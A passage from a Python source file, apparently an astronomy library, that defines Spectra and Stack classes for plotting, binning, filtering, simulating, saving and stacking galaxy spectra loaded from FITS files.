applied to all spectra. 
Default is 3.1\n :return None:\n \"\"\"\n if type(r_v) not in (list, tuple, np.ndarray):\n for item in self:\n self[item].apply_corrections(r_v=r_v)\n else:\n for item, r_vi in zip(self, r_v):\n self[item].apply_corrections(r_v=r_vi)\n\n def plot_spectra(self, fname_root, spectra='all', _range=None, ylim=None, title_text=None, backend='plotly',\n plot_model=None, f=None, normalized=False, shade_reg=None):\n \"\"\"\n Plot a series of spectra from the dictionary.\n\n :param fname_root: str\n The parent directory to save all plot figures to.\n :param spectra: str, iterable\n Dictionary keys of which spectra to plot. If 'all', all are plotted. Defaults to all.\n :param _range: optional, tuple\n x-limits on plotted data\n :param ylim: optional, tuple\n y-limits on plotted data\n :param title_text: optional, dict\n Title text to be applied to each plotted spectra. Should be a dictionary with each entry having a key\n of the spectrum name.\n :param backend: str\n 'plotly' or 'pyplot'\n :param plot_model: optional, tuple\n A tuple of two strings corresponding to keys for the data dict to plot x and y data overtop of the spectrum.\n :param f: optional, list\n A list containing values corresponding to each plot to be appended to the beginning of the file names.\n :param normalized: bool\n Whether or not to normalize the flux before plotting.\n :param shade_reg: list\n A list of tuples containing left and right boundaries over which to shade in the plot.\n :return None:\n \"\"\"\n print('Plotting spectra...')\n fmt = '.html' if backend == 'plotly' else '.pdf'\n if not os.path.exists(fname_root):\n os.makedirs(fname_root)\n if type(spectra) is str:\n if spectra == 'all':\n for i, item in enumerate(tqdm.tqdm(self)):\n ttl = None if title_text is None else title_text[item]\n if _range:\n good = np.where((self[item].wave > _range[0]) & (self[item].wave < _range[1]))[0]\n if good.size < 10:\n continue\n if f is not None:\n fname = os.path.join(fname_root,\n f'{f[i]:.3f}_' + self[item].name.replace(' ', '_') + '.spectrum' + fmt)\n else:\n fname = os.path.join(fname_root, self[item].name.replace(' ', '_') + '.spectrum' + fmt)\n self[item].plot(fname=fname,\n backend=backend, _range=_range, ylim=ylim, title_text=ttl, plot_model=plot_model,\n shade_reg=shade_reg, normalized=normalized)\n else:\n for i, item in enumerate(tqdm.tqdm(self)):\n if item in spectra or i in spectra:\n if item not in self or item not in title_text:\n print(f'WARNING: {item} not found in stack!')\n continue\n if _range:\n good = np.where((self[item].wave > _range[0]) & (self[item].wave < _range[1]))[0]\n if good.size < 10:\n continue\n ttl = None if title_text is None else title_text[item]\n if f is not None:\n fname = os.path.join(fname_root,\n f'{f[i]:.3f}_' + self[item].name.replace(' ', '_') + '.spectrum' + fmt)\n else:\n fname = os.path.join(fname_root, self[item].name.replace(' ', '_') + '.spectrum' + fmt)\n self[item].plot(fname=fname,\n backend=backend, _range=_range, ylim=ylim, title_text=ttl, plot_model=plot_model,\n shade_reg=shade_reg, normalized=normalized)\n\n def get_spec_index(self, name):\n \"\"\"\n Get the relative position in the dictionary (as an int) of a spectra given its name.\n\n :param name: str\n The key of the item in the dictionary.\n :return: int\n The index of the key in the dictionary.\n \"\"\"\n return list(self.keys()).index(name)\n\n def get_spec_name(self, index):\n \"\"\"\n Get the name of a spectra given its position in the dictionary (as an int).\n\n :param index: int\n The position of the item in 
the dictionary.\n        :return: str\n            The key of the dictionary entry.\n        \"\"\"\n        return list(self.keys())[index]\n\n    def __setitem__(self, key, spec):\n        if spec.name == 'Generic':\n            spec.name = key\n        super().__setitem__(key, spec)\n\n    def __getitem__(self, key):\n        t = type(key)\n        if t is str or t is np.str_:\n            return super().__getitem__(key)\n        elif t is int or t is np.int_:\n            return self[list(self.keys())[key]]\n        # elif t in (list, tuple, np.ndarray):\n        #     if type(key[0]) in (str, np.str_):\n        #         return [super().__getitem__(ki) for ki in key]\n        #     elif type(key[0]) is int:\n        #         return [self[list(self.keys())[ki]] for ki in key]\n\n    def __delitem__(self, key):\n        t = type(key)\n        # np.str was removed in numpy 1.24; the builtin str check already covers it\n        if t is str or t is np.str_:\n            return super().__delitem__(key)\n        elif t is int:\n            del self[list(self.keys())[key]]\n\n    @property\n    def corrected(self):\n        for item in self:\n            if not self[item].corrected:\n                return False\n        return True\n\n    def __repr__(self):\n        return f\"A collection of {len(self)} spectra.\"\n\n    def save_pickle(self, filepath):\n        \"\"\"\n        Save the object contents to a pickle file.\n\n        :param filepath: str\n            The path to save the pickle file to.\n        :return None:\n        \"\"\"\n        with open(filepath, 'wb') as handle:\n            pickle.dump(self, handle)\n\n    def save_json(self, filepath):\n        \"\"\"\n        Save the object contents to a json file.\n\n        :param filepath: str\n            The path to save the json file to.\n        :return None:\n        \"\"\"\n        with open(filepath, 'w') as handle:\n            serializable = copy.deepcopy(self)\n            for key in serializable.keys():\n                serializable[key].wave = serializable[key].wave.tolist()\n                serializable[key].flux = serializable[key].flux.tolist()\n                serializable[key].error = serializable[key].error.tolist()\n            serializable = serializable.__dict__\n            serialized = json.dumps(serializable, indent=4)\n            handle.write(serialized)\n\n    def save_toml(self, filepath):\n        \"\"\"\n        Save the object contents to a toml file.\n\n        :param filepath: str\n            The path to save the toml file to.\n        :return None:\n        \"\"\"\n        serializable = copy.deepcopy(self).__dict__\n        with open(filepath, 'w') as handle:\n            toml.dump(serializable, handle, encoder=toml.TomlNumpyEncoder())\n\n\nclass Stack(Spectra):\n\n    def __init__(self, universal_grid=None, stacked_flux=None, stacked_err=None, filters=None, r_v=3.1,\n                 gridspace=1, tolerance=500, norm_region=None, wave_criterion='lenient', progress_bar=True):\n        \"\"\"\n        An extension of the Spectra class (and by extension, the dictionary) specifically for stacking purposes.\n\n        :param universal_grid: optional, array\n            A uniform wavelength grid used for all spectra. If binned, a list of arrays for each bin.\n        :param stacked_flux: optional, array\n            An array of the stacked flux. If binned, a list of arrays for each bin.\n        :param stacked_err: optional, array\n            An array of the stacked flux error. If binned, a list of arrays for each bin.\n        :param filters: optional, array\n            An array of filters to remove individual spectra that do not satisfy certain conditions.\n            Each entry must either be a bifrost Filter object or a string that can be converted into a Filter object.\n        :param r_v: float\n            Extinction ratio A(V)/E(B-V) to calculate for. Default = 3.1\n        :param gridspace: float\n            Spacing of the wavelength grid. Default = 1\n        :param tolerance: float\n            Tolerance for throwing out spectra that are > tolerance angstroms apart from others. Default = 500\n        :param norm_region: optional, tuple\n            Wavelength bounds to use for the normalization region, with no prominent lines. 
Default = None\n :param wave_criterion: str\n One of the following:\n 'strict': Completely delete all spectra that do not satisfy wavelength coverage requirements stipulated\n by tolerance and the normalization region.\n 'lenient': Do not delete any spectra. Stack over the entire region, using the full range of spectra\n that have wavelength coverage in different parts of the spectrum. Will result in a stack with a\n different number of constituent spectra at different wavelength positions.\n :param progress_bar: bool\n If True, shows progress bars for stacking procedures. Default is False.\n \"\"\"\n # Fill in instance attributes\n self.r_v = r_v\n self.gridspace = gridspace\n self.tolerance = tolerance\n self.norm_region = norm_region\n if wave_criterion not in ('strict', 'lenient'):\n raise ValueError('wave_criterion must be one of: strict, lenient')\n self.wave_criterion = wave_criterion\n # Filters\n if filters is None:\n filters = []\n else:\n for i in range(len(filters)):\n if type(filters[i]) is str:\n filters[i] = bfilters.Filter.from_str(filters[i])\n self.filters = filters\n self.progress_bar = progress_bar\n # Default object properties that will be filled in later\n if not universal_grid:\n universal_grid = []\n if not stacked_flux:\n stacked_flux = []\n if not stacked_err:\n stacked_err = []\n self.universal_grid = universal_grid\n self.stacked_flux = stacked_flux\n self.stacked_err = stacked_err\n self.specnames_f = []\n self.specnames_e = []\n self.nspec_f = []\n self.nspec_e = []\n self.binned = None\n self.binned_spec = None\n self.bin_counts = None\n self.bin_edges = None\n self.bin_log = False\n self.agn_ref_pt = None\n super().__init__()\n\n @classmethod\n @utils.timer(name='Quick FITS Load')\n def quick_fits_stack(cls, data_path, out_path=None, n_jobs=-1, save_pickle=True, save_json=False, save_toml=False,\n limits=None, _filters=None, name_by='id', properties_tbl=None,\n properties_comment='#', properties_sep=',', properties_name_col=0, progress_bar=True,\n stack_name='stacked_data', **kwargs):\n \"\"\"\n A convenience function for quickly creating a stack object from FITS files.\n\n :param data_path: str\n The path to the parent folder containing fits files, or subfolders with fits files.\n :param out_path: str\n The output path to save output plots and pickles/jsons to. Default is \"data.stacked.YYYYMMDD_HHMMSS\"\n :param n_jobs: int\n The number of jobs to run in parallel when reading in fits files. Default is -1, meaning\n as many jobs as are allowed to run in parallel.\n :param save_pickle: bool\n Whether or not to save the Stack object as a pickle file. Default is true.\n :param save_json: bool\n Whether or not to save the Stack object as a json file. Default is false.\n :param limits: tuple\n Limit to only use data in the range of these indices.\n :param _filters: str, iterable\n Filter objects to be applied to the Stack.\n :param name_by: str\n \"folder\" or \"file\" : how to specify object keys, based on the name of the fits file or the folder that the fits\n file is in.\n :param properties_tbl: str, iterable\n A path (or paths) to a table file (.csv, .tbl, .xlsx, .txt, ...) containing properties of the spectra that are\n being loaded in separately. 
The file MUST be in the correct format:\n - The header must be the first uncommented row in the file\n - Comments should be marked with properties_comment (Default: \"#\")\n - Should be delimited by properties_sep (Default: \",\")\n - The properties_name_col (Default: 0)th column should be the object name, which should match the object\n name(s) read in from fits files/folders.\n - All other columns should list properties that the user wants to be appended to Spectrum objects.\n :param properties_sep: str\n Delimiter for the properties_tbl file. Default: \",\"\n :param properties_comment: str\n Comment character for the properties_tbl file. Default: \"#\"\n :param properties_name_col: int\n Index of the column that speicifies object name in the properties_tbl file. Default: 0.\n :param progress_bar: bool\n If True, shows a progress bar for reading in files. Default is False.\n :param stack_name: str\n The name of the stack, for file saving purposes.\n :return stack: Stack\n The Stack object.\n \"\"\"\n # Create output paths\n if not out_path:\n out_path = 'data.stacked.' + utils.gen_datestr(True)\n if not os.path.exists(out_path):\n os.makedirs(out_path)\n if out_path[-1] != os.sep:\n out_path += os.sep\n\n # Gather spectra paths\n all_spectra = utils.get_filepaths_from_parent(data_path, ['fits', 'fit', 'fit.fz', 'fits.fz', '.fts', 'FITS', 'FIT', 'FIT.FZ', 'FITS.FZ', '.FTS'])\n if limits:\n all_spectra = all_spectra[limits[0]:limits[1]]\n\n # Configure filter objects\n filter_list = []\n if not _filters:\n _filters = []\n if type(_filters) is str:\n _filters = [_filters]\n for _filter in _filters:\n filter_list.append(bfilters.Filter.from_str(_filter))\n stack = cls(filters=filter_list, progress_bar=progress_bar, **kwargs)\n\n assert name_by in ('file', 'folder', 'id'), \"name_by must be one of ['file', 'folder', 'id']\"\n\n def make_spec(filepath):\n name = None\n if name_by == 'id':\n name = None\n elif name_by == 'file':\n name = filepath.split(os.sep)[-1]\n elif name_by == 'folder':\n name = filepath.split(os.sep)[-2]\n # elif name_by == 'iau':\n # name = None\n ispec = Spectrum.from_fits(filepath, name=name)\n return ispec\n\n print('Loading in spectra...')\n range_ = tqdm.tqdm(all_spectra) if progress_bar else all_spectra\n specs = Parallel(n_jobs=n_jobs)(delayed(make_spec)(fpath) for fpath in range_)\n for ispec in specs:\n stack.add_spec(ispec)\n print('Done.')\n\n if properties_tbl:\n print('Loading in table data...')\n if type(properties_tbl) is str:\n properties_tbl = [properties_tbl]\n if type(properties_sep) is str:\n properties_sep = [properties_sep] * len(properties_tbl)\n if type(properties_comment) is str:\n properties_comment = [properties_comment] * len(properties_tbl)\n if type(properties_name_col) in (int, bool):\n properties_name_col = [properties_name_col] * len(properties_tbl)\n for tbl, sep, comm, name in zip(properties_tbl, properties_sep, properties_comment, properties_name_col):\n tbl_data = pd.read_csv(tbl, delimiter=sep, comment=comm,\n skipinitialspace=True, header=0, index_col=name)\n range_ = tqdm.tqdm(tbl_data.index) if progress_bar else tbl_data.index\n for namei in range_:\n # assert namei in stack.keys(), f\"ERROR: {namei} not found in Stack!\"\n if str(int(namei)) not in stack:\n print(f\"WARNING: {int(namei)} not found in stack!\")\n continue\n for tbl_col in tbl_data.columns:\n stack[str(int(namei))].data[tbl_col] = tbl_data[tbl_col][namei]\n print('Done.')\n\n if save_pickle:\n stack.save_pickle(out_path + stack_name + '.pkl')\n if save_json:\n 
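# Note: save_json stores the wave/flux/error arrays as plain Python lists (see Spectra.save_json), so these files can get large\n            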
stack.save_json(out_path + stack_name + '.json')\n if save_toml:\n stack.save_toml(out_path + stack_name + '.toml')\n\n return stack\n\n @classmethod\n @utils.timer(name='Quick Sim Load')\n def quick_sim_stack(cls, line, baselines, amplitudes, widths, voffs, alphas=None, h_moments=None, eta_mixes=None, \n noise_amplitudes=None, seeds=None, disp_insts=None, min_wave=3000, max_wave=8000, size=10_000, \n profiles=None, names=None, out_path=None, n_jobs=-1, save_pickle=True, save_json=False, save_toml=False,\n _filters=None, progress_bar=False):\n \"\"\"\n The main driver for the stacking code.\n\n :param line: float\n Wavelength of the line to generate simulated spectra for.\n :param baselines: iterable\n A list of baseline fluxes for each simulated spectra. Must match the length of amplitudes, widths, voffs, ...\n :param amplitudes: iterable\n A list of amplitudes for each simulated spectra. Must match the length of baselines, widths, voffs, ...\n :param widths: iterable\n A list of widths for each simulated spectra. Must match the length of baselines, amplitudes, voffs, ....\n :param voffs: iterable\n A list of velocity offsets for each simulated spectra. Must match the length of baselines, amplitudes, widths, ...\n :param alphas: iterable\n A list of power law slopes for each simulated spectra. Must match the length of baselines, amplitudes, widths, ...\n :param h_moments: iterable\n A list of hermite moments for each simulated spectra of shape (n x m) for n spectra and m moments\n :param eta_mixes: iterable\n A list of eta mixing parameters for each simulated Voigt profile.\n :param noise_amplitudes: iterable\n A list of noise amplitudes for each simulated spectra. Must match the length of amplitudes, widths, voffs, ...\n :param seeds: iterable\n A list of random number generator seeds for each simulated spectra. Must match the length of amplitudes, widths, voffs, ...\n :param min_wave: float\n Minimum wavelength in the grid.\n :param max_wave: float\n Maximum wavelength in the grid.\n :param size: integer\n The number of datapoints in the wavelength/pixel grid.\n :param profiles: iterable or str\n The profiles of each simulated spectra. \"random\" randomizes the profile of each spectrum.\n :param names: iterable\n The names of each simulated spectra.\n :param out_path: str\n The output path to save output plots and pickles/jsons to. Default is \"data.stacked.YYYYMMDD_HHMMSS\"\n :param n_jobs: int\n The number of jobs to run in parallel when reading in fits files. Default is -1, meaning\n as many jobs as are allowed to run in parallel.\n :param save_pickle: bool\n Whether or not to save the Stack object as a pickle file. Default is true.\n :param save_json: bool\n Whether or not to save the Stack object as a json file. Default is false.\n :param save_toml: bool\n Whether or not to save the Stack object as a toml file. Default is false.\n :param _filters: str, iterable\n Filter objects to be applied to the Stack.\n :param progress_bar: bool\n If True, shows a progress bar for reading in files. Default is False.\n :return stack: Stack\n The Stack object.\n\n If line is a 1D array and amplitudes, widths, and voffs are 2D arrays, this is interpreted as the 2nd dimension being all lines that \n are superimposed on the same simulated spectrum; in this case, eta_mixes must be 2D and h_moments must be 3D (n spectra x m lines x p moments)\n \"\"\"\n # Create output paths\n if not out_path:\n out_path = 'data.stacked.' 
+ utils.gen_datestr(True)\n if not os.path.exists(out_path):\n os.makedirs(out_path)\n out_path += os.sep\n\n # Configure filter objects\n filter_list = []\n if not _filters:\n _filters = []\n if type(_filters) is str:\n _filters = [_filters]\n for _filter in _filters:\n filter_list.append(bfilters.Filter.from_str(_filter))\n stack = cls(filters=filter_list, progress_bar=progress_bar)\n\n SHAPE = (size,) if type(line) in (int, float, np.int_, np.float_) else (size, len(line))\n if alphas is None:\n alphas = [None] * len(baselines)\n if h_moments is None:\n h_moments = np.full((size,2) if type(line) in (int, float, np.int_, np.float_) else (size,len(line),2), fill_value=np.nan)\n if eta_mixes is None:\n eta_mixes = np.full(SHAPE, fill_value=np.nan)\n if disp_insts is None:\n disp_insts = [None] * len(baselines)\n if noise_amplitudes is None:\n noise_amplitudes = [None] * len(baselines)\n if names is None:\n names = [None] * len(baselines)\n if seeds is None:\n seeds = [None] * len(baselines)\n\n def make_spec(baseline, amp, fwhm, voff, alpha, h, eta_mix, noise_amp, seed, disp_inst, name):\n return Spectrum.simulated(line, baseline, amp, fwhm, voff, alpha, h, eta_mix, noise_amp, seed, disp_inst,\n min_wave, max_wave, size, profiles, name)\n\n print('Generating spectra...')\n range_ = tqdm.trange(len(baselines)) if progress_bar else range(len(baselines))\n specs = Parallel(n_jobs=n_jobs)(delayed(make_spec)(baselines[i], amplitudes[i, ...], widths[i, ...], voffs[i, ...], \n alphas[i], h_moments[i, ...], eta_mixes[i, ...], noise_amplitudes[i], seeds[i], \n disp_insts[i], names[i]) for i in range_)\n for ispec in specs:\n stack.add_spec(ispec)\n\n if save_pickle:\n stack.save_pickle(out_path + 'stacked_data.pkl')\n if save_json:\n stack.save_json(out_path + 'stacked_data.json')\n if save_toml:\n stack.save_toml(out_path + 'stacked_data.toml')\n\n return stack\n\n def calc_norm_region(self, wave_grid):\n \"\"\"\n Calculate the optimal region to perform normalization. Finds the largest span of wavelengths between\n absportion lines that is also covered by all the spectra in the dictionary. Fails if no such region can\n be found. The region is set to the instance attribute self.norm_region.\n\n :param wave_grid: iterable\n A uniform wave grid used for all spectra.\n :return nr0, nr1: tuple\n The left and right edges of the normalization region.\n \"\"\"\n if self.wave_criterion == 'strict':\n emlines = np.array(\n [1033.820, 1215.240, 1240.810, 1305.530, 1335.310, 1397.610, 1399.800, 1549.480, 1640.400,\n 1665.850, 1857.400, 1908.734, 2326.000, 2439.500, 2799.117, 3346.790, 3426.850, 3727.092,\n 3729.875, 4102.890, 4341.680, 4364.436, 4862.680, 4960.295, 5008.240, 6300.304, 6363.776,\n 6374.510, 6549.860, 6564.610, 6585.270, 6718.290, 6732.670, 7891.800])\n abslines = np.array([3934.777, 3969.588, 5176.700, 5895.600, 8500.3600, 8544.440, 8664.520])\n lines = np.concatenate((emlines, abslines))\n lines.sort()\n diffs = np.diff(lines)\n for _ in range(len(diffs)):\n imax = np.nanargmax(diffs)\n nr0, nr1 = lines[imax], lines[imax + 1]\n if wave_grid[0] < nr0 < wave_grid[-1] and wave_grid[0] < nr1 < wave_grid[-1]:\n self.norm_region = (nr0, nr1)\n return nr0, nr1\n else:\n diffs[imax] = np.nan\n print(\"WARNING: An ideal normalization region could not be found! 
Using the entire range.\")\n            self.norm_region = (wave_grid[0], wave_grid[-1])\n            return wave_grid[0], wave_grid[-1]\n        elif self.wave_criterion == 'lenient':\n            print(\"WARNING: wave_criterion is lenient, so a constrained normalization region cannot be calculated.\"\n                  \" Using the ENTIRE wavelength range as the normalization region.\")\n            return wave_grid[0], wave_grid[-1]\n        else:\n            raise ValueError('invalid value for self.wave_criterion!')\n\n    def filter_spectra(self):\n        \"\"\"\n        Go through each filter and decide if each spectrum fits its criteria. If not, the spectrum is removed\n        from the stack.\n\n        :return None:\n        \"\"\"\n        aliases = {'z': 'redshift'}\n        for filt in self.filters:\n            if filt.attribute in aliases:\n                att = aliases[filt.attribute]\n            else:\n                att = filt.attribute\n            removals = []\n            for ispec in self:\n                if not (filt.lower_bound < getattr(self[ispec], att) < filt.upper_bound):\n                    print(f\"WARNING: Removing spectrum {self.get_spec_index(ispec) + 1}: {ispec} \"\n                          f\"since it does not fulfill the criteria: {filt}\")\n                    removals.append(ispec)\n            for r in removals:\n                del self[r]\n\n    def bin_spectra(self, bin_quantity, bin_size=None, nbins=None, log=False, midpoints=False, round_bins=None):\n        \"\"\"\n        Place spectra into bins for the bin_quantity.\n\n        :param bin_quantity: str\n            The quantity that the data should be binned by. Spectra must have appropriate values within their\n            self.data dictionaries.\n        :param bin_size: float\n            How large each bin should be. If specified, then do not also specify nbins.\n        :param nbins: int\n            The number of bins to use. If specified, then do not also specify bin_size.\n        :param log: bool\n            Whether or not to take the log_10 of the bin_quantity before binning.\n        :param midpoints: bool\n            Whether or not to return the midpoints of each bin instead of the edges. Default is false.\n        :param round_bins: float\n            If specified, make the bins regular by rounding the bin edges and bin size to the nearest multiple\n            of this float (e.g. the nearest 0.1 or 0.5).\n        :return binned_spec: dict\n            Dictionary containing the names of the spectra within each bin. The keys are the bin indices.\n        :return bin_counts: np.ndarray(shape=(nbins,))\n            The number of spectra in each bin.\n        :return bin_edges: np.ndarray(shape=(nbins+1,))\n            The edge values of each bin.\n        \"\"\"\n        self.bin_log = log\n        # Make sure arguments make sense\n        if not bin_size and not nbins:\n            raise ValueError(\"One of {bin_size,nbins} must be specified!\")\n        if bin_size and nbins:\n            raise ValueError(\"Both of {bin_size,nbins} may not be specified!\")\n\n        # Load in the data from each spectrum and make an array of the appropriate quantity and names\n        data = self.to_numpy('data')['data']\n        unbinned = np.array([], dtype=np.float64)\n        included = np.array([], dtype=str)  # (np.str was removed in numpy 1.24; use the builtin str)\n        for ispec in self:\n            # Gather the data to bin\n            i = self.get_spec_index(ispec)\n            if bin_quantity not in data[i].keys():\n                print(f\"WARNING: bin_quantity not found in {ispec} data! Ignoring this spectrum\")\n                continue\n            _id = data[i][bin_quantity]\n            if log:\n                _id = np.log10(_id)\n            if np.isnan(_id):\n                print(f\"WARNING: bin_quantity is {_id} in {ispec} data! Ignoring this spectrum\")\n                continue\n            included = np.append(included, ispec)\n            unbinned = np.append(unbinned, _id)\n\n        # Perform the binning\n        minbin = np.nanmin(unbinned)\n        maxbin = np.nanmax(unbinned)\n        if bin_size:\n            nbins = -int(-(maxbin - minbin) // bin_size)\n        elif nbins:\n            bin_size = (maxbin - minbin) / nbins\n        if round_bins:\n            rating = 1 / round_bins\n            minbin = np.floor(minbin * rating) / rating\n            maxbin = np.ceil(maxbin * rating) / rating\n            bin_size = np.round(bin_size * rating) / rating\n            if bin_size == 0:\n                bin_size = round_bins\n            nbins = -int(-(maxbin - minbin) // bin_size)\n\n        binned_spec = {i: np.array([], dtype=str) for i in range(nbins)}\n        bin_counts = np.zeros(nbins)\n\n        bin_edges = minbin + np.arange(0, nbins + 1, 1) * bin_size\n        bin_midpts = minbin + (np.arange(0, nbins, 1) + 0.5) * bin_size\n        for i in range(len(included)):\n            indx = int((unbinned[i] - minbin) / bin_size)\n            if indx == len(binned_spec):\n                indx -= 1\n            binned_spec[indx] = np.append(binned_spec[indx], included[i])\n            bin_counts[indx] += 1\n\n        if midpoints:\n            return binned_spec, bin_counts, bin_midpts\n        return binned_spec, bin_counts, bin_edges\n\n    def histogram_3d(self, fname_base, bin_quantities, logs, nbins=None, bin_size=None, round_bins=None, labels=None,\n                     backend='plotly', colormap=None):\n        \"\"\"\n        Make a 3D histogram of the data using 3 quantities.\n\n        :param fname_base: str\n            File name without the extension.\n        :param bin_quantities: iterable\n            List of the names of quantities to bin by.\n        :param logs: iterable\n            List of booleans on whether to take the log10 of each bin quantity.\n        :param nbins: iterable\n            List of the number of bins to use for each quantity.\n        :param bin_size: iterable\n            List of the size of each bin to use for each quantity.\n        :param round_bins: iterable\n            List of booleans whether to round bins nicely for each quantity.\n        :param labels: iterable\n            List of labels for each bin.\n        :param backend: str\n            'plotly' or 'pyplot'\n        :param colormap: str or matplotlib colormap object\n            The colormap to use for the 3rd bin quantity.\n        :return None:\n        \"\"\"\n\n        binx, biny, binz = bin_quantities\n        logx, logy, logz = logs\n        if nbins:\n            nbx, nby, nbz = nbins\n        else:\n            nbx, nby, nbz = None, None, None\n        if bin_size:\n            bsx, bsy, bsz = bin_size\n        else:\n            bsx, bsy, bsz = None, None, None\n        if round_bins:\n            rbx, rby, rbz = round_bins\n        else:\n            rbx, rby, rbz = None, None, None\n        specx, countsx, edgex = self.bin_spectra(binx, log=logx, nbins=nbx, bin_size=bsx, round_bins=rbx)\n        specy, countsy, edgey = self.bin_spectra(biny, log=logy, nbins=nby, bin_size=bsy, round_bins=rby)\n        # specz, countsz, edgez = self.bin_spectra(binz, log=logz, nbins=nbz, bin_size=bsz, round_bins=rbz)\n\n        nbx = len(countsx)\n        nby = len(countsy)\n        # nbz = len(countsz)\n        z_array = np.zeros(shape=(nby, nbx), dtype=np.float64)\n        n_array = np.zeros(shape=(nby, nbx), dtype=np.int64)\n        for x, y in itertools.product(np.arange(nbx), np.arange(nby)):\n            # specx[x], specy[y]\n            good_spec = np.array([], dtype=str)\n            z_spec = np.array([], dtype=np.float64)\n            for spec in specx[x]:\n                if spec in specy[y]:\n                    good_spec = np.append(good_spec, spec)\n                    zi = self[spec].data[binz]\n                    if logz:\n                        zi = np.log10(zi)\n                    z_spec = np.append(z_spec, zi)\n            z_array[y, x] = np.median(z_spec)\n            n_array[y, x] = good_spec.size\n\n        if backend == 'pyplot':\n            if not colormap:\n                colormap = 'winter'\n            fig, ax = plt.subplots(figsize=(nbx / nby * 7.5 + 3.5, 7.5))\n            mesh = ax.pcolormesh(edgex, edgey, z_array, shading='flat', cmap=colormap)\n\n            if not labels:\n                xlabel = binx if not 
logx else '$\\\\log($' + binx + '$)$'\n ylabel = biny if not logy else '$\\\\log($' + biny + '$)$'\n zlabel = binz if not logz else '$\\\\log($' + binz + '$)$'\n else:\n xlabel, ylabel, zlabel = labels\n fig.colorbar(mesh, ax=ax, label=zlabel)\n ax.set_xlabel(xlabel)\n ax.set_ylabel(ylabel)\n\n for x, y in itertools.product(np.arange(nbx), np.arange(nby)):\n if n_array[y, x] > 0:\n ax.text(edgex[x] + (edgex[x + 1] - edgex[x]) / 2, edgey[y] + (edgey[y + 1] - edgey[y]) / 2,\n str(n_array[y, x]),\n fontsize=7, horizontalalignment='center', verticalalignment='center', color='white')\n\n ax.set_xticks(edgex[::3])\n ax.set_yticks(edgey)\n fig.savefig(fname_base + '.pdf', dpi=300, bbox_inches='tight')\n plt.close()\n elif backend == 'plotly':\n if not colormap:\n colormap = 'plasma'\n if not labels:\n xlabel = binx if not logx else '$\\\\log(' + binx + ')$'\n ylabel = biny if not logy else '$\\\\log(' + biny + ')$'\n zlabel = binz if not logz else '$\\\\log(' + binz + ')$'\n else:\n xlabel, ylabel, zlabel = labels\n fig = plotly.graph_objects.Figure(\n data=plotly.graph_objects.Heatmap(x=edgex, y=edgey, z=z_array,\n colorbar=dict(title=zlabel), colorscale=colormap)\n )\n for x, y in itertools.product(np.arange(nbx), np.arange(nby)):\n if n_array[y, x] > 0:\n fig.add_annotation(text=str(n_array[y, x]), xref=\"x\", yref=\"y\",\n x=edgex[x] + (edgex[x + 1] - edgex[x]) / 2,\n y=edgey[y] + (edgey[y + 1] - edgey[y]) / 2, showarrow=False,\n font=dict(size=7, color=\"white\"))\n fig.update_yaxes(\n scaleratio=1,\n showgrid=False,\n zeroline=False,\n showline=True,\n linewidth=1,\n linecolor='black',\n mirror=True,\n ticks='inside',\n tickwidth=2,\n tickcolor='black',\n ticklen=10,\n title_text=ylabel\n )\n fig.update_xaxes(\n showgrid=False,\n zeroline=False,\n showline=True,\n linewidth=1,\n linecolor='black',\n mirror=True,\n ticks='inside',\n tickwidth=2,\n tickcolor='black',\n ticklen=10,\n title_text=xlabel\n )\n\n fig.update_layout(\n template='plotly_white',\n font_family=\"Georgia, Times New Roman, Serif\",\n # font_color=\"blue\",\n title_font_family=\"Georgia, Times New Roman, Serif\",\n # title_font_color=\"red\",\n # legend_title_font_color=\"green\"\n )\n fig.update_xaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n fig.update_yaxes(title_font_family=\"Georgia, Times New Roman, Serif\")\n\n # fig.update_layout(\n # paper_bgcolor='rgba(0,0,0,0)',\n # plot_bgcolor='rgba(0,0,0,0)'\n # )\n fig.write_html(fname_base + '.html', include_mathjax=\"cdn\")\n # fig.write_image(fname_base + '.pdf')\n\n def kewley_agn_class(self, bpt_1, bpt_2):\n for i, ispec in enumerate(self):\n self[ispec].k01_agn_class(bpt_1, bpt_2)\n\n # Allow the class to be called as a way to perform the stacking\n @utils.timer(name='Stack Procedure')\n def __call__(self, bin_name=None, nbins=None, bin_size=None, log=False, round_bins=None, auto_norm_region=True,\n bpt_1=None, bpt_2=None, hbin_target=3, stack_all_agns=False):\n \"\"\"\n The main procedure for stacking spectra. Performs all necessary steps at once:\n 1. Convert each spectra to their rest-frame wavelengths using their redshifts.\n 2. Correct each spectra's flux for galactic extinction.\n 3. Find the optimal, universal wavelength grid that is in a region shared by all spectra and with uniform\n spacing.\n 4. Resample each spectrum in the dictionary onto the universal grid, while conserving flux and flux error.\n 5. Normalize each spectrum to the median value in the normalization region.\n 6. 
Coadd each spectrum together using 1/error^2 as the weights at each pixel value.\n 7. Coadd the errors for each spectrum together again using 1/error^2 as the weights at each pixel value.\n\n :param bin_name: optional, str\n The name of a quantity to bin the data by before stacking each bin. Must exist in each Spectrum's data\n dictionary.\n :param nbins: optional, int\n The number of bins to use.\n If 'bin' is specified, then one of 'nbins' or 'bin_size' must also be specified.\n :param bin_size: optional, float\n The size of each bin.\n If 'bin' is specified, then one of 'nbins' or 'bin_size' must also be specified.\n :param log: optional, boolean\n If True, takes the log10 of the bin quantity BEFORE binning. 'nbins' and 'bin_size' should be specified\n according to the log10 of the bin quantity.\n :param round_bins: optional, float\n If specified, rounds the bin edges / bin sizes to be multiples of this quantity.\n :param auto_norm_region: optional, boolean\n If True, automatically calculates the normalization region for each stacked bin. Otherwise, uses the default\n value specified by the norm_region instance attribute.\n :param bpt_1: optional, str\n The name of the BPT x-value to be used if 'stack_all_agns' is True. Must exist in each Spectrum's data\n dictionary.\n :param bpt_2: optional, str\n The name of the BPT y-value to be used if 'stack_all_agns' is True. Must exist in each Spectrum's data\n dictionary.\n :param hbin_target: int\n The targeted minimum number of galaxies to include in the highest bin, if stacking by AGN distance, where\n the distance is in relation to an arbitrary reference point that we have the freedom to choose.\n Default is 3.\n :param stack_all_agns: boolean\n If True, uses the Kewley et al. 2001 AGN criteria as a cutoff and stacks ALL galaxies that satisfy this\n criteria together. 
